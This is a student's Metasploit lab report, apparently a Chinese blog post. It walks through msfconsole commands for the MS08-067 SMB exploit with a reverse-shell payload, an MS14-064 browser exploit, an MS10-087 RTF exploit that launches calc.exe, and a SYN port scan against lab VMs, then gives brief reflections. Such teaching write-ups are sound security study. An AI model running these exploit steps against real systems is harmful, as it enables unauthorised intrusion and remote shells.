标签:参数 png 方式 安全 心得 计算 漏洞 exp 自己的
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.输入msfconsole
2.输入search ms08_067进行搜索漏洞
3.复制所在位置并使用,use exploit/windows/smb/ms08_067_netapi
4.输入show options查看当前配置
5.进行配置依次输入
set payload generic/shell_reverse_tcp
set rhost 192.168.215.129(靶机的IP)
6.输入exploit进行监听,成功,输入dir进行查看
1.输入msfconsole
2.show options查看相关参数
3.设定rhost 192.168.215.129(靶机)
初始步骤同上
1.设置payload
2.根据options里的信息设置本机ip 92.168.215.128
3.设置uripath ms14064
4.设置lhost为攻击机ip 192.168.215.128
1.输入search ms10_087并输入use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
2.输入set payload windows/exec(运行一个可执行文件)
3.输入set CMD calc.exe(绑定计算器程序,进行启动)
4.输入exploit,进行攻击
5.使用show options命令查看一些参数值,比如文件名、绑定程序等等。此时文件名为默认,也可以进行修改
1.输入use auxiliary/scanner/portscan/syn(使用portscan模块)
2.输入show options
3.输入set RHOST 192.168.183.129(目标)
4.输入set THREADS 50(线程)
5.输入exploit
(1)用自己的话解释什么是exploit,payload,encode。
(2)离实战还缺些什么技术或步骤?
可以很明显看出实验的难点在寻找具有特定漏洞的虚拟机和利用一个和别人不一样的漏洞,从实战的角度来讲,也就是说搜集情报的手段和方法太过于落后,然而这也是攻击的难点所在,毕竟修改options里的项是简单的。修改什么;能否修改而需要做的信息准备是困难的。
总体来说这次实验相比于上几次实验比较简单,让我对msf有了更深刻的认识,同时也深刻体会到了msf的强大之处,虽然这次实验原理简单,过程明了,不过还是用了三个晚上加一个晚上写报告
标签:参数 png 方式 安全 心得 计算 漏洞 exp 自己的
原文地址:https://www.cnblogs.com/hhj20174315/p/12821276.html